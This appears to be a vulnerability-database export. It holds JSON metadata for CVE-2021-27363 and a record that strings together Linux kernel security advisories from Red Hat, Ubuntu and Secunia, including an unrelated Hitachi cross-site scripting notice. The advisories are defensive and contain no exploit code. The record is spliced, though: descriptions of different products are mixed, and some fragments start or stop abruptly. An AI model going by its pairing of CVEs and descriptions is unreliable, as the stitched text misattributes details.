        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-386598"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2024-07-23T20:03:59.447000Z",
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "NVD-CWE-noinfo",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-27363"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.1,
        "url": "https://security.netapp.com/advisory/ntap-20210409-0001/"
      },
      {
        "trust": 1.1,
        "url": "http://packetstormsecurity.com/files/162117/kernel-live-patch-security-notice-lsn-0075-1.html"
      },
      {
        "trust": 1.1,
        "url": "http://www.openwall.com/lists/oss-security/2021/03/06/1"
      },
      {
        "trust": 1.1,
        "url": "https://blog.grimm-co.com/2021/03/new-old-bugs-in-linux-kernel.html"
      },
      {
        "trust": 1.1,
        "url": "https://bugzilla.suse.com/show_bug.cgi?id=1182716"
      },
      {
        "trust": 1.1,
        "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=688e8128b7a92df982709a4137ea4588d16f24aa"
      },
      {
        "trust": 1.1,
        "url": "https://lists.debian.org/debian-lts-announce/2021/03/msg00010.html"
      },
      {
        "trust": 1.1,
        "url": "https://lists.debian.org/debian-lts-announce/2021/03/msg00035.html"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-27364"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-27363"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-27365"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2021-27364"
      },
      {
        "trust": 0.6,
        "url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.6,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2021-27365"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2021-27363"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-28374"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-28374"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3347"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-26708"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-0466"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-27152"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-27152"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3347"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-0466"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-26708"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-14351"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-14351"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:1267"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:1373"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-4901-1"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:1081"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:1071"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25211"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:1531"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25705"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-19532"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25705"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25211"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19532"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:1093"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-386598"
      },
      {
        "db": "PACKETSTORM",
        "id": "162242"
      },
      {
        "db": "PACKETSTORM",
        "id": "162341"
      },
      {
        "db": "PACKETSTORM",
        "id": "162115"
      },
      {
        "db": "PACKETSTORM",
        "id": "162108"
      },
      {
        "db": "PACKETSTORM",
        "id": "162098"
      },
      {
        "db": "PACKETSTORM",
        "id": "162528"
      },
      {
        "db": "PACKETSTORM",
        "id": "162112"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-27363"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-386598"
      },
      {
        "db": "PACKETSTORM",
        "id": "162242"
      },
      {
        "db": "PACKETSTORM",
        "id": "162341"
      },
      {
        "db": "PACKETSTORM",
        "id": "162115"
      },
      {
        "db": "PACKETSTORM",
        "id": "162108"
      },
      {
        "db": "PACKETSTORM",
        "id": "162098"
      },
      {
        "db": "PACKETSTORM",
        "id": "162528"
      },
      {
        "db": "PACKETSTORM",
        "id": "162112"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-27363"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2021-03-07T00:00:00",
        "db": "VULHUB",
        "id": "VHN-386598"
      },
      {
        "date": "2021-04-20T16:13:12",
        "db": "PACKETSTORM",
        "id": "162242"
      },
      {
        "date": "2021-04-27T15:18:39",
        "db": "PACKETSTORM",
        "id": "162341"
      },
      {
        "date": "2021-04-07T20:09:28",
        "db": "PACKETSTORM",
        "id": "162115"
      },
      {
        "date": "2021-04-07T20:04:40",
        "db": "PACKETSTORM",
        "id": "162108"
      },
      {
        "date": "2021-04-06T14:36:05",
        "db": "PACKETSTORM",
        "id": "162098"
      },
      {
        "date": "2021-05-11T15:20:32",
        "db": "PACKETSTORM",
        "id": "162528"
      },
      {
        "date": "2021-04-07T20:08:52",
        "db": "PACKETSTORM",
        "id": "162112"
      },
      {
        "date": "2021-03-07T04:15:13.330000",
        "db": "NVD",
        "id": "CVE-2021-27363"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2022-05-23T00:00:00",
        "db": "VULHUB",
        "id": "VHN-386598"
      },
      {
        "date": "2022-05-23T16:00:39.467000",
        "db": "NVD",
        "id": "CVE-2021-27363"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "162115"
      }
    ],
    "trust": 0.1
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Red Hat Security Advisory 2021-1267-01",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "162242"
      }
    ],
    "trust": 0.1
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "overflow",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "162242"
      },
      {
        "db": "PACKETSTORM",
        "id": "162341"
      },
      {
        "db": "PACKETSTORM",
        "id": "162108"
      },
      {
        "db": "PACKETSTORM",
        "id": "162098"
      },
      {
        "db": "PACKETSTORM",
        "id": "162528"
      },
      {
        "db": "PACKETSTORM",
        "id": "162112"
      }
    ],
    "trust": 0.6
  }
}

var-201206-0279
Vulnerability from variot

fs/proc/base.c in the Linux kernel before 2.6.39.4 does not properly restrict access to /proc/#####/io files, which allows local users to obtain sensitive I/O statistics by polling a file, as demonstrated by discovering the length of another user's password. Hitachi JP1 products are prone to a cross-site scripting vulnerability because they fail to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. The following products are affected: JP1/IT Resource Management - Manager JP1/IT Service Level Management - Manager. ----------------------------------------------------------------------

Secunia is hiring!

Find your next job here:

http://secunia.com/company/jobs/


TITLE: Hitachi JP1/IT Service Level Management Unspecified Cross-Site Scripting Vulnerability

SECUNIA ADVISORY ID: SA47804

VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/47804/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=47804

RELEASE DATE: 2012-01-31

DISCUSS ADVISORY: http://secunia.com/advisories/47804/#comments

AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)

http://secunia.com/advisories/47804/

ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS

https://ca.secunia.com/?page=viewadvisory&vuln_id=47804

ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING

http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/

DESCRIPTION: A vulnerability has been reported in Hitachi JP1/IT Service Level Management, which can be exploited by malicious people to conduct cross-site scripting attacks.

Certain unspecified input is not properly sanitised before being returned to the user.

The vulnerability is reported in version 09-50.

PROVIDED AND/OR DISCOVERED BY: Reported by the vendor.

ORIGINAL ADVISORY: Hitachi (English): http://www.hitachi.co.jp/Prod/comp/soft1/global/security/info/vuls/HS12-005/index.html

Hitachi (Japanese): http://www.hitachi.co.jp/Prod/comp/soft1/security/info/vuls/HS12-005/index.html

OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/

DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/

EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/

EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/

EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/


About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.

Subscribe: http://secunia.com/advisories/secunia_security_advisories/

Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/

Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.


Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org


. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

===================================================================== Red Hat Security Advisory

Synopsis: Important: kernel security, bug fix, and enhancement update Advisory ID: RHSA-2011:1189-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2011-1189.html Issue date: 2011-08-23 CVE Names: CVE-2011-1182 CVE-2011-1576 CVE-2011-1593 CVE-2011-1776 CVE-2011-1898 CVE-2011-2183 CVE-2011-2213 CVE-2011-2491 CVE-2011-2492 CVE-2011-2495 CVE-2011-2497 CVE-2011-2517 CVE-2011-2689 CVE-2011-2695 =====================================================================

  1. Summary:

Updated kernel packages that fix several security issues, various bugs, and add two enhancements are now available for Red Hat Enterprise Linux 6.

The Red Hat Security Response Team has rated this update as having important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.

  1. Relevant releases/architectures:

Red Hat Enterprise Linux Desktop (v. 6) - i386, noarch, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - noarch, x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, noarch, ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, noarch, x86_64

  1. Description:

Security issues:

  • Using PCI passthrough without interrupt remapping support allowed KVM guests to generate MSI interrupts and thus potentially inject traps. A privileged guest user could use this flaw to crash the host or possibly escalate their privileges on the host. The fix for this issue can prevent PCI passthrough working and guests starting. Refer to Red Hat Bugzilla bug 715555 for details. (CVE-2011-1898, Important)

  • Flaw in the client-side NLM implementation could allow a local, unprivileged user to cause a denial of service. (CVE-2011-2491, Important)

  • Integer underflow in the Bluetooth implementation could allow a remote attacker to cause a denial of service or escalate their privileges by sending a specially-crafted request to a target system via Bluetooth. (CVE-2011-2497, Important)

  • Buffer overflows in the netlink-based wireless configuration interface implementation could allow a local user, who has the CAP_NET_ADMIN capability, to cause a denial of service or escalate their privileges on systems that have an active wireless interface. (CVE-2011-2517, Important)

  • Flaw in the way the maximum file offset was handled for ext4 file systems could allow a local, unprivileged user to cause a denial of service. (CVE-2011-2695, Important)

  • Flaw allowed napi_reuse_skb() to be called on VLAN packets. An attacker on the local network could use this flaw to send crafted packets to a target, possibly causing a denial of service. (CVE-2011-1576, Moderate)

  • Integer signedness error in next_pidmap() could allow a local, unprivileged user to cause a denial of service. (CVE-2011-1593, Moderate)

  • Race condition in the memory merging support (KSM) could allow a local, unprivileged user to cause a denial of service. KSM is off by default, but on systems running VDSM, or on KVM hosts, it is likely turned on by the ksm/ksmtuned services. (CVE-2011-2183, Moderate)

  • Flaw in inet_diag_bc_audit() could allow a local, unprivileged user to cause a denial of service. (CVE-2011-2213, Moderate)

  • Flaw in the way space was allocated in the Global File System 2 (GFS2) implementation. If the file system was almost full, and a local, unprivileged user made an fallocate() request, it could result in a denial of service. Setting quotas to prevent users from using all available disk space would prevent exploitation of this flaw. (CVE-2011-2689, Moderate)

  • Local, unprivileged users could send signals via the sigqueueinfo system call, with si_code set to SI_TKILL and with spoofed process and user IDs, to other processes. This flaw does not allow existing permission checks to be bypassed; signals can only be sent if your privileges allow you to already do so. (CVE-2011-1182, Low)

  • Heap overflow in the EFI GUID Partition Table (GPT) implementation could allow a local attacker to cause a denial of service by mounting a disk containing crafted partition tables. (CVE-2011-1776, Low)

  • Structure padding in two structures in the Bluetooth implementation was not initialized properly before being copied to user-space, possibly allowing local, unprivileged users to leak kernel stack memory to user-space. (CVE-2011-2492, Low)

  • /proc/[PID]/io is world-readable by default. Previously, these files could be read without any further restrictions. A local, unprivileged user could read these files, belonging to other, possibly privileged processes to gather confidential information, such as the length of a password used in a process. (CVE-2011-2495, Low)

Red Hat would like to thank Vasily Averin for reporting CVE-2011-2491; Dan Rosenberg for reporting CVE-2011-2497 and CVE-2011-2213; Ryan Sweat for reporting CVE-2011-1576; Robert Swiecki for reporting CVE-2011-1593; Andrea Righi for reporting CVE-2011-2183; Julien Tinnes of the Google Security Team for reporting CVE-2011-1182; Timo Warns for reporting CVE-2011-1776; Marek Kroemeke and Filip Palian for reporting CVE-2011-2492; and Vasiliy Kulikov of Openwall for reporting CVE-2011-2495.

  1. Solution:

Refer to the Technical Notes, available shortly from the link in the References, for bug fix and enhancement details.

Users should upgrade to these updated packages, which contain backported patches to correct these issues, and fix the bugs and add the enhancements noted in the Technical Notes. The system must be rebooted for this update to take effect.

Before applying this update, make sure all previously-released errata relevant to your system have been applied.

This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/kb/docs/DOC-11259

To install kernel packages manually, use "rpm -ivh [package]". Do not use "rpm -Uvh" as that will remove the running kernel binaries from your system. You may use "rpm -e" to remove old kernels after determining that the new kernel functions properly on your system.

  1. Bugs fixed (http://bugzilla.redhat.com/):

690028 - CVE-2011-1182 kernel signal spoofing issue 695173 - CVE-2011-1576 kernel: net: Fix memory leak/corruption on VLAN GRO_DROP 697822 - CVE-2011-1593 kernel: proc: signedness issue in next_pidmap() 703019 - CVE-2011-2492 kernel: bluetooth: l2cap and rfcomm: fix 1 byte infoleak to userspace 703026 - CVE-2011-1776 kernel: validate size of EFI GUID partition entries 709393 - CVE-2011-2491 kernel: rpc task leak after flock()ing NFS share 710338 - CVE-2011-2183 kernel: ksm: race between ksmd and exiting task 713827 - Parallel port issue in RHEL 6.0 server 714536 - CVE-2011-2213 kernel: inet_diag: insufficient validation 714982 - GFS2: Update to rhel6.1 broke dovecot writing to a gfs2 filesystem 715555 - CVE-2011-1898 virt: VT-d (PCI passthrough) MSI trap injection 716539 - bump domain memory limits [6.1.z] 716805 - CVE-2011-2497 kernel: bluetooth: buffer overflow in l2cap config request 716825 - CVE-2011-2495 kernel: /proc/PID/io infoleak 718152 - CVE-2011-2517 kernel: nl80211: missing check for valid SSID size in scan operations 720861 - CVE-2011-2689 kernel: gfs2: make sure fallocate bytes is a multiple of blksize 722557 - CVE-2011-2695 kernel: ext4: kernel panic when writing data to the last block of sparse file

  1. Package List:

Red Hat Enterprise Linux Desktop (v. 6):

Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/kernel-2.6.32-131.12.1.el6.src.rpm

i386: kernel-2.6.32-131.12.1.el6.i686.rpm kernel-debug-2.6.32-131.12.1.el6.i686.rpm kernel-debug-debuginfo-2.6.32-131.12.1.el6.i686.rpm kernel-debug-devel-2.6.32-131.12.1.el6.i686.rpm kernel-debuginfo-2.6.32-131.12.1.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-131.12.1.el6.i686.rpm kernel-devel-2.6.32-131.12.1.el6.i686.rpm kernel-headers-2.6.32-131.12.1.el6.i686.rpm perf-2.6.32-131.12.1.el6.i686.rpm perf-debuginfo-2.6.32-131.12.1.el6.i686.rpm

noarch: kernel-doc-2.6.32-131.12.1.el6.noarch.rpm kernel-firmware-2.6.32-131.12.1.el6.noarch.rpm

x86_64: kernel-2.6.32-131.12.1.el6.x86_64.rpm kernel-debug-2.6.32-131.12.1.el6.x86_64.rpm kernel-debug-debuginfo-2.6.32-131.12.1.el6.x86_64.rpm kernel-debug-devel-2.6.32-131.12.1.el6.x86_64.rpm kernel-debuginfo-2.6.32-131.12.1.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-131.12.1.el6.x86_64.rpm kernel-devel-2.6.32-131.12.1.el6.x86_64.rpm kernel-headers-2.6.32-131.12.1.el6.x86_64.rpm perf-2.6.32-131.12.1.el6.x86_64.rpm perf-debuginfo-2.6.32-131.12.1.el6.x86_64.rpm

Red Hat Enterprise Linux HPC Node (v. 6):

Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/kernel-2.6.32-131.12.1.el6.src.rpm

noarch: kernel-doc-2.6.32-131.12.1.el6.noarch.rpm kernel-firmware-2.6.32-131.12.1.el6.noarch.rpm

x86_64: kernel-2.6.32-131.12.1.el6.x86_64.rpm kernel-debug-2.6.32-131.12.1.el6.x86_64.rpm kernel-debug-debuginfo-2.6.32-131.12.1.el6.x86_64.rpm kernel-debug-devel-2.6.32-131.12.1.el6.x86_64.rpm kernel-debuginfo-2.6.32-131.12.1.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-131.12.1.el6.x86_64.rpm kernel-devel-2.6.32-131.12.1.el6.x86_64.rpm kernel-headers-2.6.32-131.12.1.el6.x86_64.rpm perf-2.6.32-131.12.1.el6.x86_64.rpm perf-debuginfo-2.6.32-131.12.1.el6.x86_64.rpm

Red Hat Enterprise Linux Server (v. 6):

Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/kernel-2.6.32-131.12.1.el6.src.rpm

i386: kernel-2.6.32-131.12.1.el6.i686.rpm kernel-debug-2.6.32-131.12.1.el6.i686.rpm kernel-debug-debuginfo-2.6.32-131.12.1.el6.i686.rpm kernel-debug-devel-2.6.32-131.12.1.el6.i686.rpm kernel-debuginfo-2.6.32-131.12.1.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-131.12.1.el6.i686.rpm kernel-devel-2.6.32-131.12.1.el6.i686.rpm kernel-headers-2.6.32-131.12.1.el6.i686.rpm perf-2.6.32-131.12.1.el6.i686.rpm perf-debuginfo-2.6.32-131.12.1.el6.i686.rpm

noarch: kernel-doc-2.6.32-131.12.1.el6.noarch.rpm kernel-firmware-2.6.32-131.12.1.el6.noarch.rpm

ppc64: kernel-2.6.32-131.12.1.el6.ppc64.rpm kernel-bootwrapper-2.6.32-131.12.1.el6.ppc64.rpm kernel-debug-2.6.32-131.12.1.el6.ppc64.rpm kernel-debug-debuginfo-2.6.32-131.12.1.el6.ppc64.rpm kernel-debug-devel-2.6.32-131.12.1.el6.ppc64.rpm kernel-debuginfo-2.6.32-131.12.1.el6.ppc64.rpm kernel-debuginfo-common-ppc64-2.6.32-131.12.1.el6.ppc64.rpm kernel-devel-2.6.32-131.12.1.el6.ppc64.rpm kernel-headers-2.6.32-131.12.1.el6.ppc64.rpm perf-2.6.32-131.12.1.el6.ppc64.rpm perf-debuginfo-2.6.32-131.12.1.el6.ppc64.rpm

s390x: kernel-2.6.32-131.12.1.el6.s390x.rpm kernel-debug-2.6.32-131.12.1.el6.s390x.rpm kernel-debug-debuginfo-2.6.32-131.12.1.el6.s390x.rpm kernel-debug-devel-2.6.32-131.12.1.el6.s390x.rpm kernel-debuginfo-2.6.32-131.12.1.el6.s390x.rpm kernel-debuginfo-common-s390x-2.6.32-131.12.1.el6.s390x.rpm kernel-devel-2.6.32-131.12.1.el6.s390x.rpm kernel-headers-2.6.32-131.12.1.el6.s390x.rpm kernel-kdump-2.6.32-131.12.1.el6.s390x.rpm kernel-kdump-debuginfo-2.6.32-131.12.1.el6.s390x.rpm kernel-kdump-devel-2.6.32-131.12.1.el6.s390x.rpm perf-2.6.32-131.12.1.el6.s390x.rpm perf-debuginfo-2.6.32-131.12.1.el6.s390x.rpm

x86_64: kernel-2.6.32-131.12.1.el6.x86_64.rpm kernel-debug-2.6.32-131.12.1.el6.x86_64.rpm kernel-debug-debuginfo-2.6.32-131.12.1.el6.x86_64.rpm kernel-debug-devel-2.6.32-131.12.1.el6.x86_64.rpm kernel-debuginfo-2.6.32-131.12.1.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-131.12.1.el6.x86_64.rpm kernel-devel-2.6.32-131.12.1.el6.x86_64.rpm kernel-headers-2.6.32-131.12.1.el6.x86_64.rpm perf-2.6.32-131.12.1.el6.x86_64.rpm perf-debuginfo-2.6.32-131.12.1.el6.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 6):

Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/kernel-2.6.32-131.12.1.el6.src.rpm

i386: kernel-2.6.32-131.12.1.el6.i686.rpm kernel-debug-2.6.32-131.12.1.el6.i686.rpm kernel-debug-debuginfo-2.6.32-131.12.1.el6.i686.rpm kernel-debug-devel-2.6.32-131.12.1.el6.i686.rpm kernel-debuginfo-2.6.32-131.12.1.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-131.12.1.el6.i686.rpm kernel-devel-2.6.32-131.12.1.el6.i686.rpm kernel-headers-2.6.32-131.12.1.el6.i686.rpm perf-2.6.32-131.12.1.el6.i686.rpm perf-debuginfo-2.6.32-131.12.1.el6.i686.rpm

noarch: kernel-doc-2.6.32-131.12.1.el6.noarch.rpm kernel-firmware-2.6.32-131.12.1.el6.noarch.rpm

x86_64: kernel-2.6.32-131.12.1.el6.x86_64.rpm kernel-debug-2.6.32-131.12.1.el6.x86_64.rpm kernel-debug-debuginfo-2.6.32-131.12.1.el6.x86_64.rpm kernel-debug-devel-2.6.32-131.12.1.el6.x86_64.rpm kernel-debuginfo-2.6.32-131.12.1.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-131.12.1.el6.x86_64.rpm kernel-devel-2.6.32-131.12.1.el6.x86_64.rpm kernel-headers-2.6.32-131.12.1.el6.x86_64.rpm perf-2.6.32-131.12.1.el6.x86_64.rpm perf-debuginfo-2.6.32-131.12.1.el6.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package

  1. References:

https://www.redhat.com/security/data/cve/CVE-2011-1182.html https://www.redhat.com/security/data/cve/CVE-2011-1576.html https://www.redhat.com/security/data/cve/CVE-2011-1593.html https://www.redhat.com/security/data/cve/CVE-2011-1776.html https://www.redhat.com/security/data/cve/CVE-2011-1898.html https://www.redhat.com/security/data/cve/CVE-2011-2183.html https://www.redhat.com/security/data/cve/CVE-2011-2213.html https://www.redhat.com/security/data/cve/CVE-2011-2491.html https://www.redhat.com/security/data/cve/CVE-2011-2492.html https://www.redhat.com/security/data/cve/CVE-2011-2495.html https://www.redhat.com/security/data/cve/CVE-2011-2497.html https://www.redhat.com/security/data/cve/CVE-2011-2517.html https://www.redhat.com/security/data/cve/CVE-2011-2689.html https://www.redhat.com/security/data/cve/CVE-2011-2695.html https://access.redhat.com/security/updates/classification/#important https://docs.redhat.com/docs/en-US/Red_Hat_Enterprise_Linux/6/html/6.1_Technical_Notes/kernel.html#RHSA-2011-1189 https://bugzilla.redhat.com/show_bug.cgi?id=715555

  1. Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

Copyright 2011 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux)

iD8DBQFOU72NXlSAg2UNWIIRAvuvAJ0XW+pjVB73eYV6dyMHJAKRZqTyygCeIAtM +72YbSFubpSk5fCdBrnH5XY= =wVAB -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . Description:

These packages contain the Linux kernel. (CVE-2011-2482, Important)

If you do not run applications that use SCTP, you can prevent the sctp module from being loaded by adding the following to the end of the "/etc/modprobe.d/blacklist.conf" file:

blacklist sctp

This way, the sctp module cannot be loaded accidentally, which may occur if an application that requires SCTP is started. When using a fully-virtualized guest on a host that does not use hardware assisted paging (HAP), such as those running CPUs that do not have support for (or those that have it disabled) Intel Extended Page Tables (EPT) or AMD Virtualization (AMD-V) Rapid Virtualization Indexing (RVI), a privileged guest user could trigger this flaw to cause the hypervisor to crash.

This update also fixes the following bugs:

  • On Broadcom PCI cards that use the tg3 driver, the operational state of a network device, represented by the value in "/sys/class/net/ethX/operstate", was not initialized by default. Consequently, the state was reported as "unknown" when the tg3 network device was actually in the "up" state. This update modifies the tg3 driver to properly set the operstate value. (BZ#744699)

  • A KVM (Kernel-based Virtual Machine) guest can get preempted by the host, when a higher priority process needs to run. When a guest is not running for several timer interrupts in a row, ticks could be lost, resulting in the jiffies timer advancing slower than expected and timeouts taking longer than expected. To correct for the issue of lost ticks, do_timer_tsc_timekeeping() checks a reference clock source (kvm-clock when running as a KVM guest) to see if timer interrupts have been missed. If so, jiffies is incremented by the number of missed timer interrupts, ensuring that programs are woken up on time. (BZ#747874)

  • When a block device object was allocated, the bd_super field was not being explicitly initialized to NULL. Previously, users of the block device object could set bd_super to NULL when the object was released by calling the kill_block_super() function. Certain third-party file systems do not always use this function, and bd_super could therefore become uninitialized when the object was allocated again. This could cause a kernel panic in the blkdev_releasepage() function, when the uninitialized bd_super field was dereferenced. Now, bd_super is properly initialized in the bdget() function, and the kernel panic no longer occurs. (BZ#751137)

ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-server, linux-powerpc), a standard system upgrade will automatically perform this as well. ========================================================================== Ubuntu Security Notice USN-1244-1 October 25, 2011

linux-ti-omap4 vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

  • Ubuntu 10.10

Summary:

Several security issues were fixed in the kernel. A remote attacker could exploit this to crash the kernel, leading to a denial of service. (CVE-2011-2183)

Vasily Averin discovered that the NFS Lock Manager (NLM) incorrectly handled unlock requests. (CVE-2011-2491)

Vasiliy Kulikov discovered that taskstats did not enforce access restrictions. A local attacker could exploit this to read certain information, leading to a loss of privacy. (CVE-2011-2494)

